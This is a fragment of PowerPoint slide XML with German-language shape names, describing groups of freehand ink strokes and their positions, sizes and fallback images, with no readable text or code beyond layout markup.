                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8E4168-69D5-4EF9-B15A-BA2AEB1C4A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89968" y="714194"/>
                    <a:ext cx="349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04B3D6D-68AD-45C8-9664-C5E108D9C3D7}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1460888" y="838394"/>
                  <a:ext cx="109440" cy="114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09ECF8A4-8D1D-4BC3-BEF3-9BDAA8FF27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452248" y="829754"/>
                    <a:ext cx="127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ACA86F2-BAF8-4433-956C-AB288F7AEFB7}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1565288" y="845954"/>
                  <a:ext cx="29160" cy="979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8F93437B-F85D-4125-9687-30B1E3B75B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556288" y="837314"/>
                    <a:ext cx="46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751E0C78-4AF8-442E-870D-C73498BB8EBE}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1608488" y="816794"/>
                  <a:ext cx="86040" cy="111960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="35" name="Freihand 34">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E64A6B-6FB7-43DE-80E0-65255AB3A2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599848" y="808154"/>
                    <a:ext cx="103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94EDAB85-CFA4-4B68-91B0-DBC3FFB30796}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1729088" y="749114"/>
                  <a:ext cx="19080" cy="177840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="37" name="Freihand 36">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61834A8-3C09-45B1-8F64-F7BD144E338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20088" y="740474"/>
                    <a:ext cx="367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EF28CF11-213F-4C1B-9FF9-E88323DC558A}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1747808" y="803834"/>
                  <a:ext cx="59040" cy="121320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="38" name="Freihand 37">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3888D57B-0D40-4506-BAAB-43F8EFF179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738808" y="794834"/>
                    <a:ext cx="766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E31EFCF-3E82-435B-A885-A4753C61D19F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1821968" y="812474"/>
                  <a:ext cx="93600" cy="111600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="39" name="Freihand 38">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88C06193-57BE-4019-A4DF-25421FFD40E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812968" y="803834"/>
                    <a:ext cx="11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3E3207D-564E-4BF6-8EF4-870CEBE0ED1B}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1953728" y="836594"/>
                  <a:ext cx="31680" cy="1076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F475C2A7-DEE6-48C4-8194-9406A151CC4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45088" y="827594"/>
                    <a:ext cx="493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6C852D19-8FC1-430D-866E-FFC0E7596223}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1938608" y="751634"/>
                  <a:ext cx="4320" cy="1188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797DE076-AC42-4D1D-94B1-3F086177FB4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29608" y="742994"/>
                    <a:ext cx="2196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9538CBC-D12D-4560-B1E6-88479BA6F350}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2019608" y="835154"/>
                  <a:ext cx="97200" cy="89280"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="43" name="Freihand 42">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616627CC-73E0-4CB2-8533-84B697FF8B5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010968" y="826154"/>
                    <a:ext cx="1148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3271055-387A-497D-986E-923ACDCC83BF}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2131568" y="742634"/>
                  <a:ext cx="17280" cy="183600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="44" name="Freihand 43">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9849DAD0-18DC-4394-9FBF-2B0D187642F6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22928" y="733994"/>
                    <a:ext cx="3492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A604E82E-0245-4A1E-8872-AE77E634A436}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2175128" y="831914"/>
                  <a:ext cx="89640" cy="81360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="45" name="Freihand 44">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFB1F97-AB0F-423E-BD04-196C3D196E0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166128" y="823274"/>
                    <a:ext cx="1072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46CD9D45-CEBC-4D5A-A515-47AFA99B1EF5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2296808" y="902114"/>
                  <a:ext cx="10440" cy="5400"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="46" name="Freihand 45">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB4AFCE-254A-49A8-AA5D-CFF78F94A35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288168" y="893114"/>
                    <a:ext cx="280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028419B7-B0A6-42F0-BAD7-8EC412F8B458}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2353328" y="810314"/>
                  <a:ext cx="108360" cy="109080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="47" name="Freihand 46">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E77E990-208C-4857-B2CA-ECAF050427F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344688" y="801674"/>
                    <a:ext cx="12600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F5E947A7-8A6A-469C-A99B-21BA95F1CAD5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2498408" y="810314"/>
                  <a:ext cx="103680" cy="97920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="48" name="Freihand 47">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DD2A25-0767-4B5D-B361-51B1581E9B9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489768" y="801314"/>
                    <a:ext cx="1213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D21A25F1-193F-419B-AC9D-7B65C1ABBF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="812335" y="995367"/>
              <a:ext cx="1361520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="1361520" cy="318240"/>
            </a:xfrm>
          </p:grpSpPr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DC0DDB13-2164-4309-91E6-C916BF820F60}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3729526" y="1005434"/>
                <a:ext cx="1055520" cy="318240"/>
                <a:chOff x="3729526" y="1005434"/>
                <a:chExt cx="1055520" cy="318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42" name="Freihand 141">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FBF8F9-91FB-47FD-9709-94D3DBF28C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9526" y="1005434"/>
                    <a:ext cx="229320" cy="318240"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="68" name="Freihand 67">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35710D4-9B8F-4B50-B227-E3FC4DF12DCC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720526" y="996434"/>
                      <a:ext cx="246960" cy="33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43" name="Freihand 142">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57181B1-C2D8-472F-A3DC-F1294EE55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75966" y="1163834"/>
                    <a:ext cx="100440" cy="15840"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="69" name="Freihand 68">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEBB58D0-D513-4EF0-943C-1123591042F5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767326" y="1154834"/>
                      <a:ext cx="11808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44" name="Freihand 143">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB7FB07-EC94-4DBC-BB26-9D61A9543D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326" y="1006874"/>
                    <a:ext cx="21600" cy="299160"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="71" name="Freihand 70">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F35009FE-E19D-42B4-BF63-CB2D10C1506B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10686" y="997874"/>
                      <a:ext cx="3924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45" name="Freihand 144">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CF9672-72F6-45EB-8D1B-98ADB156E0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73966" y="1096154"/>
                    <a:ext cx="119160" cy="12960"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="72" name="Freihand 71">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DEBFB14-C763-46B8-A861-2C1EF7661219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964966" y="1087514"/>
                      <a:ext cx="136800" cy="3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46" name="Freihand 145">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D20CB1DC-73A9-40BF-89CC-3EAC71FD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9526" y="1013354"/>
                    <a:ext cx="37440" cy="297000"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="73" name="Freihand 72">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF20DF54-4FE1-4C41-ACC7-A260ECCDF11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4170526" y="1004354"/>
                      <a:ext cx="55080" cy="31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47" name="Freihand 146">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05371051-4F8F-491A-8F2C-228683CEA5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94206" y="1089674"/>
                    <a:ext cx="177480" cy="33120"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="74" name="Freihand 73">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E0B4152-4ADE-4358-AA15-5DDDD42425E4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085206" y="1080674"/>
                      <a:ext cx="195120" cy="5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48" name="Freihand 147">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8E7AA9-63E9-488B-BABE-7AADD526D9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94726" y="1167794"/>
                    <a:ext cx="118080" cy="118080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="76" name="Freihand 75">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25579A89-C958-421C-818C-C1193B286E3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286086" y="1158794"/>
                      <a:ext cx="13572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49" name="Freihand 148">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A14AB3-2887-4274-9B7E-560AD769A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3966" y="1165634"/>
                    <a:ext cx="57240" cy="108360"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="77" name="Freihand 76">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56F536-7896-4828-9D52-A99147AF8B41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14966" y="1156994"/>
                      <a:ext cx="7488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50" name="Freihand 149">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA648E5E-F1F1-45EF-BCC4-352921344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35926" y="1176794"/>
                    <a:ext cx="124920" cy="109080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="78" name="Freihand 77">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59682C3E-0521-4F0A-922F-FD8D53C6C520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26926" y="1168154"/>
                      <a:ext cx="14256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151" name="Freihand 150">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F530C4E2-4931-443C-97D5-2E969B434F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2006" y="1061234"/>
                    <a:ext cx="24120" cy="229320"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="79" name="Freihand 78">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9913FB-AE13-4673-B4BF-CA1D4EF0B83C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663366" y="1052594"/>
                      <a:ext cx="41760" cy="2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152" name="Freihand 151">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE191947-E96D-4FBE-913C-D0D6595A9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06926" y="1144034"/>
                    <a:ext cx="78120" cy="140040"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p:cNvPr id="82" name="Freihand 81">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5290717-DE50-440A-B1CA-A004810B20A4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4697926" y="1135394"/>
                      <a:ext cx="9576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64B65819-4362-43EF-8C1F-F5E75195ED7F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4830766" y="1146554"/>
                  <a:ext cx="120960" cy="11592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6FC74C8F-716E-4DCC-A3D1-5158B5AA3DF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822126" y="1137554"/>
                    <a:ext cx="13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C4F1C706-7969-471D-9185-FB59FB6C5613}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4994566" y="1115954"/>
                  <a:ext cx="96480" cy="1630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D6C8784D-F4A5-4191-8674-52DB509DF28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4985926" y="1106954"/>
                    <a:ext cx="11412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769564B0-DE12-4DA7-9F4B-7256EC0512F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="688966" y="840914"/>
              <a:ext cx="1555200" cy="87840"/>
              <a:chOff x="688966" y="840914"/>
              <a:chExt cx="1555200" cy="8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F59A5F4-5B4F-437A-86D6-62E4C85ACCCD}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="688966" y="914354"/>
                  <a:ext cx="91440" cy="144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1B67F204-BF94-41AE-9EB7-A624346BB4A6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9966" y="905354"/>
                    <a:ext cx="1090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AE5BA407-7B87-4D40-9209-DEA719F1F963}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="889846" y="886274"/>
                  <a:ext cx="97200" cy="1368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587E0CF5-BB4A-4E53-A89C-1D4A8CF0C25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81206" y="877634"/>
                    <a:ext cx="11484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4B98CAE-B07C-4E08-8526-1CA4267929C4}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1107286" y="886994"/>
                  <a:ext cx="109080" cy="1296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68F14080-7143-47AB-85D2-9F746A8DEDE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98286" y="878354"/>
                    <a:ext cx="12672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067B4CDF-62DF-4A1E-BE85-92A782EFCE31}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1324366" y="876914"/>
                  <a:ext cx="93600" cy="1044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5C10C10F-B3CF-4FD2-AE78-12C8454B8DF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315726" y="867914"/>
                    <a:ext cx="11124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74B06897-33BF-4A85-B1E6-AB7E67FC19E9}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1533886" y="882314"/>
                  <a:ext cx="93600" cy="90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6768984B-3AB3-4243-A7E4-121E6CD7F893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524886" y="873674"/>
                    <a:ext cx="11124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48E9DCD5-D242-4FCE-9A1E-70943CBA03E9}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1716046" y="878714"/>
                  <a:ext cx="116640" cy="576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BD2A631C-F6C7-4A8D-891E-90897A542A29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707406" y="870074"/>
                    <a:ext cx="1342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5692F827-0F63-42F1-98BF-5F59BB89F555}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1964446" y="857114"/>
                  <a:ext cx="87840" cy="864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EE5912C2-369F-469B-B7FC-717ED622CE0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955806" y="848474"/>
                    <a:ext cx="1054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40998FD-8017-4845-AC14-231FB501AE17}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2154526" y="840914"/>
                  <a:ext cx="89640" cy="15480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="98" name="Freihand 97">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97520F73-BF94-4396-9F5E-41DA1A3372A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145886" y="831914"/>
                    <a:ext cx="10728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8BFF6F89-5F06-4786-AEA2-FBECF95BD868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1572765">
            <a:off x="7980745" y="4187412"/>
            <a:ext cx="1090080" cy="390600"/>
            <a:chOff x="3426766" y="948194"/>
            <a:chExt cx="1090080" cy="390600"/>
          </a:xfrm>
        </p:grpSpPr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114CC851-B51A-45F0-8448-2E4A09B4AD03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13F73DD-196F-450C-8522-252587911F8D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72733AEE-71AE-4AB8-8462-133C41B4C9D7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BDD29910-03B2-46F0-BCB6-2C969EBBBE1F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91825486-8254-4847-A6B1-2AD8697DCE9C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B2300307-AD12-48BB-B121-F64C6BEE7EA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7AAAC532-86A6-41A3-BB9F-77EFD49845B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BEDCD773-89AF-4CAB-93F8-D0770F85D008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0FF86429-4B67-4862-9BC8-E66C4911A838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F8E2B94E-DD7D-476E-A186-6C7956A8DDA3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7138F76C-08C0-4B8B-BA1D-8A3550B511E9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EA872315-F8A2-41CA-AAC9-0158B5827E15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29F6D0A5-E0E0-4220-8FA9-4F9DB3C9DFB7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03781296-477A-46D3-B51C-3D86B7A717C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9685158" y="3812445"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="1233360"/>
          </a:xfrm>
        </p:grpSpPr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96E5C424-BB12-485C-9306-081FA5BB1067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8A064815-6ADE-41D0-893E-9D74C11F380F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9BE5BA5D-DF56-4E40-B859-2D1E07EABEA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BA568039-3029-49C7-8738-5CDDC2EAE22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1895D73-5A59-444A-95BB-BCB264A32015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DA08A67E-B4F3-4D48-BDE6-56D1843268F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uppieren 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064907C2-054E-46FB-9E01-BCC0230BCC34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B137110-02B2-449F-B6C3-29CC31D293C1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EF0E07EA-BEEC-4993-8E4E-7B994B8324E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A6674622-93AF-44AB-BEA5-0B428AED0446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460A046-51EB-4C2D-AD48-2962E15E469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254E6B59-A37E-491A-BB2A-2A6AABFFC35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0" name="Freihand 189">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F363A6-E381-4177-AED9-CFB999305F2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4D6065FE-C880-4002-81DF-87BCC86DC2D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CBDD25B1-0EDE-47BC-A7A9-3545BC1273B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uppieren 192">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253E3813-F8DD-4055-B728-2BD057C881D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5DEADC16-301D-4545-9F49-098B6198BC0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1A679A15-B933-492B-84C8-A9DD2D3B270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4" name="Gruppieren 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BB2C49-081F-451E-846D-5EFF2E93B2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02" name="Freihand 201">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326C7393-2278-4D32-BF63-8DDF6E7BF79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3" name="Freihand 202">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6410851-1B86-49CF-B8A8-331B85DE8B8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483E9C8B-1582-4D0D-A13B-601C1855E34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6E3EE9B1-ADF4-44A1-9613-9F5CBCAC39C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7" name="Gruppieren 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94440FC-370F-4A44-A0B2-62B7F67B652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98" name="Freihand 197">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7AF1D0-2B70-4DEB-A86A-252304E3989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99" name="Freihand 198">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D27A76-22BA-4EF1-94CE-4B7D9E11650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0" name="Freihand 199">
                    <a:extLst>
